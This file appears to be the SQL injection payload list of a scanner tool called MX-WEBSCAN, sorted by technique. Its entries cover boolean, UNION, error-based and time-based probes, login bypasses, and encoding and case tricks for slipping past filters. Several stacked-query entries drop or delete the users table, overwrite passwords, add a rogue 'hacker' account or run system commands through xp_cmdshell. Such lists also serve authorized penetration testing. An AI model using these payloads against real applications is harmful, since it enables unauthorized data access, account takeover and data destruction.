# SQL Injection Payloads - MX-WEBSCAN
# Hecho en México 🇲🇽

# Basic SQL Injection
'
"
`
')
")
`)
''
""
``
\
%27
%22
%60
%27%27
%22%22
%60%60

# Boolean Based
' or 1=1--
" or 1=1--
` or 1=1--
' or 1=1#
" or 1=1#
` or 1=1#
' or 1=1;--
' or 1=1;#
' or '1'='1
" or "1"="1
' or 1=1 LIMIT 1--
' or 1=1 LIMIT 1#
'or 1=1--
"or 1=1--
`or 1=1--
' or '1'='1'--
" or "1"="1"--
' or 1=1;%00

# UNION Based
' union select null--
' union select null,null--
' union select null,null,null--
' union select null,null,null,null--
' union select 1,2,3--
' union select 1,2,3,4--
' union select 1,2,3,4,5--
' union select 1,2,3,4,5,6--
' union select 1,2,3,4,5,6,7--
' union select 1,2,3,4,5,6,7,8--
' union select 1,2,3,4,5,6,7,8,9--
' union select 1,2,3,4,5,6,7,8,9,10--
' UNION SELECT @@version,2,3--
' UNION SELECT database(),2,3--
' UNION SELECT user(),2,3--
' UNION SELECT current_user(),2,3--
' UNION SELECT session_user(),2,3--
' UNION SELECT system_user(),2,3--
' UNION ALL SELECT 1,2,3--
' UNION ALL SELECT NULL,NULL,NULL--
' UNION ALL SELECT table_name,2,3 FROM information_schema.tables--
' UNION ALL SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT * FROM users--

# Error Based
' AND 1=CONVERT(int, @@version)--
' AND 1=CONVERT(int, user())--
' AND 1=CONVERT(int, database())--
' AND ExtractValue(0, CONCAT(0x5c, @@version))--
' AND UpdateXML(0, CONCAT(0x5c, @@version), 0)--
' AND (SELECT * FROM(SELECT COUNT(*),CONCAT(@@version,0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND json_keys(NULL, CONCAT(0x5c, @@version))--

# Time Based
' AND SLEEP(5)--
' AND SLEEP(5);--
' AND BENCHMARK(5000000, MD5('test'))--
' AND pg_sleep(5)--
' AND WAITFOR DELAY '00:00:05'--
' OR SLEEP(5)--
' OR BENCHMARK(5000000, MD5('test'))--
' OR pg_sleep(5)--
' OR WAITFOR DELAY '00:00:05'--
' ;waitfor delay '00:00:05'--
' ;WAITFOR DELAY '00:0:0'--
1' AND SLEEP(5) AND '1'='1
1' AND BENCHMARK(5000000, MD5('test')) AND '1'='1
1' AND pg_sleep(5) AND '1'='1
1' AND WAITFOR DELAY '00:00:05' AND '1'='1
'; WAITFOR DELAY '00:00:05'--
'; SELECT SLEEP(5); --
'; SELECT BENCHMARK(5000000, MD5('test')); --

# Stacked Queries
'; DROP TABLE users--
'; DROP TABLE users;--
'; DELETE FROM users--
'; UPDATE users SET password='hacked' WHERE id=1--
'; INSERT INTO users (username, password) VALUES ('hacker', 'hacked')--
'; CREATE TABLE hacked (id int, data text)--
'; EXEC xp_cmdshell('whoami')--
'; EXEC master..xp_cmdshell('whoami')--
'; EXEC xp_cmdshell 'whoami';--
'; exec xp_cmdshell 'whoami'--

# Authentication Bypass
admin'--
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin' UNION SELECT 1,'admin','password'--
' UNION SELECT 1, 'admin', 'password' FROM users--

# MySQL Specific
' AND 1=1--
' AND 1=2--
' AND 1=1#
' AND 1=2#
' AND 1=1/*'
' AND 1=2/*'
' AND '1'='1
' AND '1'='2
' AND 1=1 AND '%'='
' AND 1=2 AND '%'='
' AND ASCII(SUBSTRING(@@version,1,1))=53--
' AND ORD(MID(@@version,1,1))=53--
' AND (SELECT SUBSTRING(@@version,1,1))='5'--
' AND (SELECT MID(@@version,1,1))='5'--
' AND 1=1 AND SLEEP(5)--
' AND 1=1 AND BENCHMARK(5000000, MD5('test'))--
' AND RLIKE('^.+$', @@version)--

# MSSQL Specific
' AND 1=1--
' AND 1=2--
' AND '1'='1
' AND '1'='2
' AND 1=1 AND 'a'='a
' AND 1=1 AND 'a'='b
' AND @@version like '%12%'--
' AND @@version like '%14%'--
' AND (SELECT @@version) like '%14%'--
' AND (SELECT @@version) like '%15%'--
' AND (SELECT @@version) like '%16%'--
' AND 1=1 AND WAITFOR DELAY '00:00:05'--
' AND 1=1 AND WAITFOR DELAY '00:00:05' AND 'a'='a
' ; WITH XMLNAMESPACES(''http://schemas.microsoft.com/sqlserver/2004/07/showplan'') SELECT 1 WHERE 1=(SELECT 1)-- 

# Oracle Specific
' AND 1=1--
' AND 1=2--
' AND '1'='1
' AND '1'='2
' AND ROWNUM=1--
' AND 1=1 AND dbms_pipe.receive_message('RDS',5)--
' AND 1=1 AND dbms_pipe.receive_message('RDS',5)>1--
' AND 1=1 AND utl_inaddr.get_host_address('localhost')--
' AND 1=1 AND utl_http.request('http://localhost')--
' AND 1=1 AND ctxsys.drithsx.sn(user, (SELECT banner FROM v$version WHERE rownum=1))--

# PostgreSQL Specific
' AND 1=1--
' AND 1=2--
' AND '1'='1
' AND '1'='2
' AND 1=CAST((SELECT version()) AS int)--
' AND 1=CAST((SELECT current_user) AS int)--
' AND 1=CAST((SELECT current_database()) AS int)--
' AND 1=1 AND 1=(SELECT 1 FROM PG_SLEEP(5))--
' AND 1=1 AND 1=(SELECT 1 FROM PG_SLEEP(5)) AND '1'='1
' AND 1=1 AND 1 IN (SELECT 1 FROM PG_SLEEP(5))--
' AND 1=1 AND generate_series(1,10)--

# NoSQL Injection (MongoDB)
' && 1==1--
' && 1==1//
' && 1==1%00
' && this.password.match(/.*/)--
' && this.password.match(/.*///
' && this.password.match(/.*/)%00
' || 1==1--
' || 1==1//
' || 1==1%00
' ;return true;var foo=' 
' ;return true;var foo='//
' ;return true;var foo='%00
' && this.cmd == 'whoami'--

# JSON Injection
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": "^.*"}, "password": {"$regex": "^.*"}}
{"$or": [{"username": "admin"}, {"password": {"$regex": "^.*"}}]}
{"username": "admin", "password": {"$ne": null}}
{"username": {"$in": ["admin", "root"]}, "password": {"$in": ["admin", "root"]}}

# Comments
'--
'#
'/*
'/**/
'/*!*/ 
';--
';#
';/*
';%00
%27--
%27#
%27/*
%27/**/
%27%00
-- 
#
/*
/**/
;--
;#
;/*
;%00

# White Space Bypass
'/**/OR/**/1=1--
'/**/AND/**/1=1--
'%0AOR%0A1=1--
'%0DOR%0D1=1--
'%09OR%09 1=1--
'%0BOR%0B1=1--
'%0COR%0C1=1--
'/**/UNION/**/SELECT/**/1,2,3--

# Case Bypass
' Or 1=1--
' AnD 1=1--
' UnIoN SeLeCt 1,2,3--
' UnIoN aLL SeLeCt 1,2,3--
' AnD SlEeP(5)--
' AnD BeNcHmArK(5000000, Md5('test'))--

# Hex Encoding
' OR 1=1--
' OR 0x313d31--
' OR 0x31=0x31--
' UNION SELECT 0x31,0x32,0x33--
' AND SLEEP(0x5)--
' AND 0x31=0x31--
' AND 0x31=0x32--

# URL Encoding
%27%20OR%201%3D1--
%27%20OR%201%3D1%23
%27%20OR%201%3D1%2D%2D
%27%20AND%201%3D1--
%27%20AND%201%3D2--
%27%20UNION%20SELECT%201%2C2%2C3--
%27%20AND%20SLEEP(5)--

# Double URL Encoding
%2527%2520OR%25201%253D1--
%2527%2520AND%25201%253D1--
%2527%2520UNION%2520SELECT%25201%252C2%252C3--
%2527%2520AND%2520SLEEP%25285%2529--

# Unicode Encoding
%u0027 OR 1=1--
%u0027 AND 1=1--
%u0027 UNION SELECT 1,2,3--
%u0027 AND SLEEP(5)--
%uff07 OR 1=1--
%uff07 AND 1=1--

# Second Order Injection
' OR 1=1--
' AND 1=1--
' UNION SELECT 1,2,3--
' AND SLEEP(5)--
' AND BENCHMARK(5000000, MD5('test'))--
